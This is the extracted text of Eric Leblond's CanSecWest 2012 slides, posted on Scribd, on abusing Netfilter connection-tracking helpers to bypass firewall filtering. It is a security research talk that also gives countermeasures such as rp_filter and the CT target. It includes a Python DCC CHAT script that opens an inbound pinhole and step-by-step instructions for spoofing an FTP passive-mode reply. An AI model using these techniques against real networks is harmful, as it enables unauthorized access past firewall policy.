Scribd
Upload
252 views123 pages

Conntrack Attack

This document discusses how application layer gateways (ALGs) in Netfilter, the Linux packet filtering framework, can be exploited to bypass firewalls. It provides background on Netfilter and how it implements stateful packet inspection and ALGs through "helpers" to handle non-linear protocols like FTP. While Netfilter helpers have sane defaults that prevent opening arbitrary connections, crafting protocol messages could allow an attacker to bypass firewall rules under certain conditions if helpers are misconfigured. The document analyzes the degree of freedom helpers provide and potential impacts.

Uploaded by

Ignacio Guerrero
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
252 views123 pages

Conntrack Attack

This document discusses how application layer gateways (ALGs) in Netfilter, the Linux packet filtering framework, can be exploited to bypass firewalls. It provides background on Netfilter and how it implements stateful packet inspection and ALGs through "helpers" to handle non-linear protocols like FTP. While Netfilter helpers have sane defaults that prevent opening arbitrary connections, crafting protocol messages could allow an attacker to bypass firewall rules under certain conditions if helpers are misconfigured. The document analyzes the degree of freedom helpers provide and potential impacts.

Uploaded by

Ignacio Guerrero
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 123

Playing with network layers to bypass firewalls

filtering policy
ric Leblond
OISF

Cansecwest 2012

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

1 / 44

Eric Leblond a.k.a Regit

French
Network security expert
Free Software enthousiast
NuFW project creator (Now ufwi), EdenWall co-founder
Netfilter developer:
Ulogd2: Netfilter logging daemon
Misc contributions:
NFQUEUE library and associates
Source NAT randomisation (defeat Kaminskys DNS attack)

Currently:
Independant security consultant
Suricata IDS/IPS funded developer

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

2 / 44

Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers

Attack description
Conditions and principles
FTP case
Others protocols

Impact and existing protection


Netfilter
Checkpoint

Conclusion

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

3 / 44

Netilter
Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

4 / 44

Netilter
Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.

Features
Stateful and stateless packet filtering (IPv4 and IPv6).
Network address and port translation.
Multiple layers of APIs for 3rd party extensions.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

4 / 44

Netilter
Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.

Features
Stateful and stateless packet filtering (IPv4 and IPv6).
Network address and port translation.
Multiple layers of APIs for 3rd party extensions.

Iptables
Command line utility to do operation on rules.
It has access to all Netfilter features.
Two utilities: iptables for IPv4, ip6tables for IPv6.
i p t a b l e s A FORWARD p t c p syn d p o r t 80 \
m c o n n l i m i t c o n n l i m i t above 2 j REJECT
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

4 / 44

Netfilters stateful inspection

Netfilter keeps a list of all active connections.


Packet connection is looked up in connections list (the
conntrack).
Packet is tagged with one of the following state:
NEW
ESTABLISHED
INVALID

It can be used to decide on the fate of the packet:


i p t a b l e s A FORWARD m s t a t e s t a t e ESTABLISHED j ACCEPT
i p t a b l e s A FORWARD m s t a t e s t a t e NEW p t c p d p o r t 80 j ACCEPT

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

5 / 44

Application Level Gateway


Non-linear protocol
One can find protocols such as FTP or SIP:
They rely on a signalling channel.
It is used to setup dynamic connections.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

6 / 44

Application Level Gateway


Non-linear protocol
One can find protocols such as FTP or SIP:
They rely on a signalling channel.
It is used to setup dynamic connections.

Application Level Gateway (ALG)


ALGs search the traffic for command messages.
They extract information on the expected connections.
Each expectation:
includes information on a potential connection.
is associated to a timeout.

New connection matching an expectation can be accepted.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

6 / 44

The example of FTP


FTP client

Tcpdump

Logged i n t o f t p . l i p 6 . f r .
ncftp / > ls
etc /
jussieu /
lip6 /

195.83.118.1.21 > 10.62.101.203.52994


195.83.118.1.21 > 10.62.101.203.52994
10.62.101.203.57636 > 195.83.118.1.51155
10.62.101.203.52994 > 195.83.118.1.21
195.83.118.1.51155 > 10.62.101.203.57636

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

7 / 44

The example of FTP


FTP client

Tcpdump

Logged i n t o f t p . l i p 6 . f r .
ncftp / > ls
etc /
jussieu /
lip6 /

195.83.118.1.21 > 10.62.101.203.52994


195.83.118.1.21 > 10.62.101.203.52994
10.62.101.203.57636 > 195.83.118.1.51155
10.62.101.203.52994 > 195.83.118.1.21
195.83.118.1.51155 > 10.62.101.203.57636

Protocol
C:
S:
C:
S:
S:
C:

PASV
227 Entering Passive Mode (195,83,118,1,199,211)
MLSD
150 Opening ASCII mode data connection for MLSD.
226 MLSD complete.
QUIT

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

7 / 44

The example of FTP


FTP client

Tcpdump

Logged i n t o f t p . l i p 6 . f r .
ncftp / > ls
etc /
jussieu /
lip6 /

195.83.118.1.21 > 10.62.101.203.52994


195.83.118.1.21 > 10.62.101.203.52994
10.62.101.203.57636 > 195.83.118.1.51155
10.62.101.203.52994 > 195.83.118.1.21
195.83.118.1.51155 > 10.62.101.203.57636

Protocol
C:
S:
C:
S:
S:
C:

PASV
227 Entering Passive Mode (195,83,118,1,199,211)
MLSD
150 Opening ASCII mode data connection for MLSD.
226 MLSD complete.
QUIT

Netfilter
# c o n n t r a c k E expect
[NEW] 300 p r o t o =6 s r c =10.62.101.203 d s t =195.83.118.1 s p o r t =0 d p o r t =51155
[DESTROY] 300 p r o t o =6 s r c =10.62.101.203 d s t =195.83.118.1 s p o r t =0 d p o r t =51155
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

7 / 44

Details of Netfilter implementation


ALGs in Netfilter
ALGs are called Helpers.
Each protocol is implemented as a kernel module.
Loading options can be used to configure the helper.
Fine-grained setup can be achieved with the CT iptables target.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

8 / 44

Details of Netfilter implementation


ALGs in Netfilter
ALGs are called Helpers.
Each protocol is implemented as a kernel module.
Loading options can be used to configure the helper.
Fine-grained setup can be achieved with the CT iptables target.

Current modules list in Vanilla linux kernel


amanda
ftp
ipv4
irc
tftp

pptp
proto_gre
proto_udplite
sip

ric Leblond (OISF)

broadcast
h323
ipv6
netbios_ns

proto_dccp
proto_sctp
sane
snmp

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

8 / 44

Expectations in Netfilter
The expectation table
Expectations are stored in a specific table.
It is similar to the conntrack table.
Only one tuple is used.
A short timeout is added.

An entry is destroyed when it matches with a packet.


As a response, a new connection entry is created.
It is RELATED to the signalling connection.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

9 / 44

Expectations in Netfilter
The expectation table
Expectations are stored in a specific table.
It is similar to the conntrack table.
Only one tuple is used.
A short timeout is added.

An entry is destroyed when it matches with a packet.


As a response, a new connection entry is created.
It is RELATED to the signalling connection.

Accepting RELATED connections


i p t a b l e s A FORWARD m s t a t e s t a t e ESTABLISHED , RELATED j ACCEPT

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policyCansecwest 2012

9 / 44

Do I use helpers?
What happens if I load a helper?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

10 / 44

Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

10 / 44

Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?
Do helpers transform my firewall in openbar?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

10 / 44

Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?
Do helpers transform my firewall in openbar?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

10 / 44

Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?
Do helpers transform my firewall in openbar?

A study is needed.
Lets look at the helpers.
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

10 / 44

Degree of freedom of Netfilter helpers


Module
ftp
ftp
h323
irc
sip signalling
sip signalling

Source
Fixed
Full
Fixed
Full
Fixed
Full

Destination
In CMD
In CMD
Fixed
Fixed
Fixed
In CMD

Port Dest
In CMD
In CMD
In CMD
In CMD
In CMD
In CMD

Option
loose = 1 (dflt)
loose = 0

sip_direct_signalling = 1 (dflt)
sip_direct_signalling = 0

Legend:
Fixed: Value comes from the signalling connection. It cant be
forged.
In CMD: The value comes from protocol message parsing and can
be forged.
Full: Freedom is total. All values are accepted.

Options are specific to Netfilter.


However the degree of freedom will be similar for any firewall
using ALGs.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

11 / 44

Global analysis

Sane defaults
Dangerous extensions of protocols have been disabled.
If we study the attack of client on a server:
It is impossible to open arbitrary connections to the server.
The level of security is acceptable.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

12 / 44

Global analysis

Sane defaults
Dangerous extensions of protocols have been disabled.
If we study the attack of client on a server:
It is impossible to open arbitrary connections to the server.
The level of security is acceptable.

In the limit of protocols


Security is ensured with regard to the protocol usability.
IRC helper is really user-friendly.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

12 / 44

FTP analysis

If we follow RFC (loose = 0).


A FTP server can participate to the initialization of a connection
from client to another server.
It can open arbitrary connections through the firewall.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

13 / 44

FTP analysis

If we follow RFC (loose = 0).


A FTP server can participate to the initialization of a connection
from client to another server.
It can open arbitrary connections through the firewall.

If we care about security (loose = 1).


Expectation are statically bound to the server address.
The possible openings are acceptable.
This is the default value.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

13 / 44

IRC analysis
The DCC command
DCC command enables transfer between end-point.
It is impossible to know the source address.
Destination port is fixed by the client.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

14 / 44

IRC analysis
The DCC command
DCC command enables transfer between end-point.
It is impossible to know the source address.
Destination port is fixed by the client.

Consequences
Allowing DCC is thus allowing client to enable arbitrary connection
to his IP.
Client computer is given a complete freedom of connection
opening.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

14 / 44

IRC analysis
The DCC command
DCC command enables transfer between end-point.
It is impossible to know the source address.
Destination port is fixed by the client.

Consequences
Allowing DCC is thus allowing client to enable arbitrary connection
to his IP.
Client computer is given a complete freedom of connection
opening.
A mistake is simply another way of doing things.
(Katharine Graham)

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

14 / 44

Using DCC command

Client NATed behind firewall, port N is closed

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

15 / 44

Using DCC command

Client NATed behind firewall, port N is closed


Client sends a DCC command to a valid IRC server

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

15 / 44

Using DCC command

Client NATed behind firewall, port N is closed


Client sends a DCC command to a valid IRC server
Firewall creates expectation and laptop can open a connection
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

15 / 44

Exploit code
import socket
d e f ipnumber ( i p ) :
ip=ip . r s t r i p ( ) . s p l i t ( . )
i p n =0
while ip :
i p n =( ipn < <8)+ i n t ( i p . pop ( 0 ) )
return ipn
h o s t = " i r c . freenode . n e t "
d p o r t =6667 # IRC p o r t
s = s o c k e t . s o c k e t ( s o c k e t . AF_INET , s o c k e t .SOCK_STREAM)
s . connect ( ( host , d p o r t ) )
i p = " 1 9 2 . 1 6 8 . 1 . 1 2 9 " # L o c a l address o f c l i e n t
p o r t =6000 # P o r t t o open on I n t e r n e t
atmsg = PRIVMSG opensvp : \ x01DCC CHAT CHAT %d %d \ x01 \ r \ n \ \
% ( ipnumber ( i p ) , p o r t )
s . send ( atmsg )
s . close ( )

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

16 / 44

Demonstration of DCC usage

Video
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

17 / 44

Demonstration of DCC usage

Video
Lets connect from Internet to port 6000 of a NATed client.
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

17 / 44

Secure use of Netfilter helpers


Disable helper by default
Load with port 0 or use a dedicated proc entry (After 3.3 Linux kernel):
modprobe n f _ c o n n t r a c k _ f t p p o r t s =0

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

18 / 44

Secure use of Netfilter helpers


Disable helper by default
Load with port 0 or use a dedicated proc entry (After 3.3 Linux kernel):
modprobe n f _ c o n n t r a c k _ f t p p o r t s =0

Use the CT target


Activate the helper for chosen connections and do explicit
authorization of RELATED traffic:
i p t a b l e s A PREROUTING t raw p t c p d p o r t 21 \ \
d $MY_FTP_SERVER j CT h e l p e r f t p
i p t a b l e s A FORWARD m c o n n t r a c k c t s t a t e RELATED \ \
m h e l p e r h e l p e r f t p d $MY_FTP_SERVER \ \
p t c p d p o r t 1024: j ACCEPT

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

18 / 44

Secure use of Netfilter helpers


Disable helper by default
Load with port 0 or use a dedicated proc entry (After 3.3 Linux kernel):
modprobe n f _ c o n n t r a c k _ f t p p o r t s =0

Use the CT target


Activate the helper for chosen connections and do explicit
authorization of RELATED traffic:
i p t a b l e s A PREROUTING t raw p t c p d p o r t 21 \ \
d $MY_FTP_SERVER j CT h e l p e r f t p
i p t a b l e s A FORWARD m c o n n t r a c k c t s t a t e RELATED \ \
m h e l p e r h e l p e r f t p d $MY_FTP_SERVER \ \
p t c p d p o r t 1024: j ACCEPT

More information
See http://home.regit.org/netfilter-en/secure-use-of-helpers/
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

18 / 44

Known attacks
Cisco Bug ID CSCdr09226
goal: Open pinhole in the firewall.
Force the server to generate a message interpreted as a
command by the firewall.
An error condition can be used to trigger the abnormal behaviour.
https://listserv.icsalabs.com/pipermail/firewall-wizards/2000-March/
008385.html

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

19 / 44

Known attacks
Cisco Bug ID CSCdr09226
goal: Open pinhole in the firewall.
Force the server to generate a message interpreted as a
command by the firewall.
An error condition can be used to trigger the abnormal behaviour.
https://listserv.icsalabs.com/pipermail/firewall-wizards/2000-March/
008385.html

A Stateful Inspection of FireWall-1


Panorama of attacks on Checkpoint FireWall-1
Interesting techniques using FWZ encapsulation.
T. Lopatic, J. McDonald, D. Song, Black Hat Briefings 2000

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

19 / 44

Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers

Attack description
Conditions and principles
FTP case
Others protocols

Impact and existing protection


Netfilter
Checkpoint

Conclusion

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

20 / 44

Objective

Determine if it is possible as client to trigger unwanted behaviour:


Can we open arbitrary pinholes through a firewall?
Can we open more ports on a server?
Can we access to badly protected service ?
Such as an internal database
Such as vulnerable services

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

21 / 44

Objective

Determine if it is possible as client to trigger unwanted behaviour:


Can we open arbitrary pinholes through a firewall?
Can we open more ports on a server?
Can we access to badly protected service ?
Such as an internal database
Such as vulnerable services

Our study of helpers has shown that it is not possible out of the
box:
Client capabilities are always limited.
Dangerous extensions have been blocked.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

21 / 44

Objective

Determine if it is possible as client to trigger unwanted behaviour:


Can we open arbitrary pinholes through a firewall?
Can we open more ports on a server?
Can we access to badly protected service ?
Such as an internal database
Such as vulnerable services

Our study of helpers has shown that it is not possible out of the
box:
Client capabilities are always limited.
Dangerous extensions have been blocked.

An alternative approach should be found.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

21 / 44

Basic idea

Only the server can send useful messages.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Basic idea

Only the server can send useful messages.


We need to trigger the server to send a crafted message.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Basic idea

Only the server can send useful messages.


We need to trigger the server to send a crafted message.
We cant force the server to do it.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Basic idea

Only the server can send useful messages.


We need to trigger the server to send a crafted message.
We cant force the server to do it.
One can consider sending a message for the server.
A computer can forge any IP packet
and send it to the gateway
if the computer is on the same ethernet network as the gateway.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Basic idea

Only the server can send useful messages.


We need to trigger the server to send a crafted message.
We cant force the server to do it.
One can consider sending a message for the server.
A computer can forge any IP packet
and send it to the gateway
if the computer is on the same ethernet network as the gateway.

An attacker on a directly connected network can send packets:

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Basic idea

Only the server can send useful messages.


We need to trigger the server to send a crafted message.
We cant force the server to do it.
One can consider sending a message for the server.
A computer can forge any IP packet
and send it to the gateway
if the computer is on the same ethernet network as the gateway.

An attacker on a directly connected network can send packets:


to the ethernet address of the firewall

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Basic idea

Only the server can send useful messages.


We need to trigger the server to send a crafted message.
We cant force the server to do it.
One can consider sending a message for the server.
A computer can forge any IP packet
and send it to the gateway
if the computer is on the same ethernet network as the gateway.

An attacker on a directly connected network can send packets:


to the ethernet address of the firewall
with the IP address of the server

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Basic idea

Only the server can send useful messages.


We need to trigger the server to send a crafted message.
We cant force the server to do it.
One can consider sending a message for the server.
A computer can forge any IP packet
and send it to the gateway
if the computer is on the same ethernet network as the gateway.

An attacker on a directly connected network can send packets:


to the ethernet address of the firewall
with the IP address of the server

Lets try to use this method.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

22 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

Invert source and destination ethernet address.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

Invert source and destination ethernet address.


Modify payload to a server command choosing parameters.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

Invert source and destination ethernet address.


Modify payload to a server command choosing parameters.
Increment IP id.
Set TCP sequence number correctly using traffic data.
Update all checksums and lengths.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

Invert source and destination ethernet address.


Modify payload to a server command choosing parameters.
Increment IP id.
Set TCP sequence number correctly using traffic data.
Update all checksums and lengths.
4

The attacker sends the forged packet to the network.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

Invert source and destination ethernet address.


Modify payload to a server command choosing parameters.
Increment IP id.
Set TCP sequence number correctly using traffic data.
Update all checksums and lengths.
4

The attacker sends the forged packet to the network.

The firewall sees the forged request.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

Invert source and destination ethernet address.


Modify payload to a server command choosing parameters.
Increment IP id.
Set TCP sequence number correctly using traffic data.
Update all checksums and lengths.
4

The attacker sends the forged packet to the network.

The firewall sees the forged request.

The firewall creates an expectation with the parameters given


by the server.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

Attack description
1

The attacker opens a network connection using a given protocol.

He sniffs the network traffic for that protocol.


He gets one packet coming from server.

Invert source and destination ethernet address.


Modify payload to a server command choosing parameters.
Increment IP id.
Set TCP sequence number correctly using traffic data.
Update all checksums and lengths.
4

The attacker sends the forged packet to the network.

The firewall sees the forged request.

The firewall creates an expectation with the parameters given by


the server.

The attacker opens a connection with the chosen parameters.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

23 / 44

FTP protocol study


Dynamic connection
In FTP, dynamic connections can be opened to the server:

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

24 / 44

FTP protocol study


Dynamic connection
In FTP, dynamic connections can be opened to the server:
The server sends a message to the client to indicate him what
port to use.
Client then connects to the provided IP and port.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

24 / 44

FTP protocol study


Dynamic connection
In FTP, dynamic connections can be opened to the server:
The server sends a message to the client to indicate him what
port to use.
Client then connects to the provided IP and port.

IPv4 case
To ask a client to connect to 192.168.2.2 on port 3306:
227 Entering Passive Mode (192,168,2,2,12,234)\r\n

The message format is simple, the only trick to know is that


12 256 + 334 = 3306.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

24 / 44

FTP protocol study


Dynamic connection
In FTP, dynamic connections can be opened to the server:
The server sends a message to the client to indicate him what
port to use.
Client then connects to the provided IP and port.

IPv4 case
To ask a client to connect to 192.168.2.2 on port 3306:
227 Entering Passive Mode (192,168,2,2,12,234)\r\n

The message format is simple, the only trick to know is that


12 256 + 334 = 3306.

IPv6 case
To ask a client to connect on port 3306:
229 Extended Passive Mode OK (|||3306|)\r\n
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

24 / 44

Attack description for FTP


1

The attacker sniffs traffic coming from a FTP server.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

25 / 44

Attack description for FTP


1

The attacker sniffs traffic coming from a FTP server.

He opens a connection to the FTP server.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

25 / 44

Attack description for FTP


1

The attacker sniffs traffic coming from a FTP server.

He opens a connection to the FTP server.


He forges a packet using the last packet received from server:

Invert source and destination ethernet address.


Increment IP ID IP. Set TCP sequence number correctly using
traffic data.
Modify payload to a server command choosing parameters.
227 Entering Passive Mode (192,168,2,2,12,234)

Update all checksums and lengths.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

25 / 44

Attack description for FTP


1

The attacker sniffs traffic coming from a FTP server.

He opens a connection to the FTP server.


He forges a packet using the last packet received from server:

Invert source and destination ethernet address.


Increment IP ID IP. Set TCP sequence number correctly using
traffic data.
Modify payload to a server command choosing parameters.
227 Entering Passive Mode (192,168,2,2,12,234)

Update all checksums and lengths.


4

The attacker sends the forged packet to the firewall.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

25 / 44

Attack description for FTP


1

The attacker sniffs traffic coming from a FTP server.

He opens a connection to the FTP server.


He forges a packet using the last packet received from server:

Invert source and destination ethernet address.


Increment IP ID IP. Set TCP sequence number correctly using
traffic data.
Modify payload to a server command choosing parameters.
227 Entering Passive Mode (192,168,2,2,12,234)

Update all checksums and lengths.


4

The attacker sends the forged packet to the firewall.

The firewall creates an expectation for a connection to


192.168.2.2 on port 3306.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

25 / 44

Attack description for FTP


1

The attacker sniffs traffic coming from a FTP server.

He opens a connection to the FTP server.


He forges a packet using the last packet received from server:

Invert source and destination ethernet address.


Increment IP ID IP. Set TCP sequence number correctly using
traffic data.
Modify payload to a server command choosing parameters.
227 Entering Passive Mode (192,168,2,2,12,234)

Update all checksums and lengths.


4

The attacker sends the forged packet to the firewall.

The firewall creates an expectation for a connection to


192.168.2.2 on port 3306.

The attacker connects to 192.168.2.2 on port 3306.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

25 / 44

Demonstration on Netfilter

Video

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

26 / 44

Demonstration on Netfilter

Video
Lets have firewall with a filtering policy allowing only port 21 and open
a connection to port 22 on a FTP server.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

26 / 44

Policy violation

Weve manage to open a


connection to port 22

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

27 / 44

Policy violation

Weve manage to open a


connection to port 22
With a filtering policy that
does not allow it.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

27 / 44

Policy violation

Weve manage to open a


connection to port 22
With a filtering policy that
does not allow it.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

27 / 44

Policy violation

Weve manage to open a


connection to port 22
With a filtering policy that
does not allow it.
Easy little cat, easy!

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

27 / 44

Counter-measures

Anti-spoofing is sufficient to block the attack.


Reverse path filtering is our friend:
Only accept packet coming to an interface if we have a route to the
source IP.
This will avoid that the kernel handles the attack packet.

Is this that easy to be protected?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

28 / 44

Counter-measures

Anti-spoofing is sufficient to block the attack.


Reverse path filtering is our friend:
Only accept packet coming to an interface if we have a route to the
source IP.
This will avoid that the kernel handles the attack packet.

Is this that easy to be protected? Yes

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

28 / 44

Counter-measures

Anti-spoofing is sufficient to block the attack.


Reverse path filtering is our friend:
Only accept packet coming to an interface if we have a route to the
source IP.
This will avoid that the kernel handles the attack packet.

Is this that easy to be protected? Yes


But wait, there is still some surprise.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

28 / 44

Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

29 / 44

Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?
Same technique applies with the following conditions:
Attacker and client are separated by firewall.
Attacker is on a network directly connected to the firewall.
IRC traffic can be sniffed by attacker (MITM or server).

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

29 / 44

Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?
Same technique applies with the following conditions:
Attacker and client are separated by firewall.
Attacker is on a network directly connected to the firewall.
IRC traffic can be sniffed by attacker (MITM or server).

This is not interesting.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

29 / 44

Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?
Same technique applies with the following conditions:
Attacker and client are separated by firewall.
Attacker is on a network directly connected to the firewall.
IRC traffic can be sniffed by attacker (MITM or server).

This is not interesting.

SIP
The server sends port parameters in a similar way as FTP.
The same attack is possible.
Only the content has to be changed.
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

29 / 44

Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers

Attack description
Conditions and principles
FTP case
Others protocols

Impact and existing protection


Netfilter
Checkpoint

Conclusion

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

30 / 44

Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.
Disabled by default.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

